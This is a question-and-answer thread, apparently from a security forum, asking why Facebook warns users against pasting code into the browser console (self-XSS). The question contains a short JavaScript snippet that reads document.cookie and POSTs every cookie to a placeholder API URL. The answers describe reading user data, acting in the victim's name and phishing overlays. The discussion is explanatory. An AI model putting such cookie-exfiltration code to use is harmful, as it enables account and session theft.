Facebook's warning of self-xss

Question

I happened to open my browser console on Facebook recently and was greeted with the following message.

Stop!

This is a browser feature intended for developers. If someone told you to copy and paste something here to enable a Facebook feature or "hack" someone's account, it is a scam and will give them access to your Facebook account.

See https://www.facebook.com/selfxss for more information.

My first thought was this was simply over-kill maybe intended to scare away those unsuspecting internet peoples who would blindly copy and paste some javascript into the console in the hopes of unlocking a secret dislike button.

But I've actually been thinking more about how you could compromise a users session data from the Javascript console.

I thought about a script looping over the document.cookie variable and posting all the cookie data to an api. Something similar to the below.

var cookies = document.cookie.split(';');
var xhr = new XMLHttpRequest();
xhr.open("POST", apiUrl, true);
xhr.setRequestHeader('Content-Type', 'application/json');

for(var i=0 ; i < cookies.length ; ++i) {
    var pair = cookies[i].trim().split('=');
    xhr.send(JSON.stringify({
        name: pair[0],
        value: pair[1]
    }));
}

But my understanding is that adding the http-only flag to a cookie means it can't be accessed by javascript or client side.

So how could an attacker get you to compromise your facebook account purely by self-xss ?

Answer 1

The warning is talking about "access to your Facebook account", not complete control.

Self-XSS works like any XSS. While you cannot read the httpOnly session cookie, you can:

• read any data available to the attacked user (messages, secret groups, profile infos, etc)
• send arbitrary requests in the name of the attacked user (send messages, create posts, etc)
• display arbitrary data to the attacked user (fake messages or posts, phishing attackers, etc)

Answer 2

Quoting directly from Abe Miessler's answer:

"Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user."

I would emphasize the last part of this definition: "...to a different end user."

In my mind, to qualify as a XSS attack you would need to submit a request to a website and have that site respond with the malicious content. The ways this can happen is typically broken down into two different methods:

When you convince your victim to blindly enter text into their browser console, you're basically getting them to directly execute Javascript scripts on their page. This isn't technically XSS, but leaving semantics aside, there are other malicious things you could do with full script-execution capabilities to a victim:

• Create a fake login page or add your own resources (or overlays).

• Submit posts, execute other actions on their page (like liking posts, submitting pictures, whatever)

As you've already said, setting the http-only flag on a cookie does prevent it from being accessed through the console, but that's not the only attack vector that's available once you have code execution rights.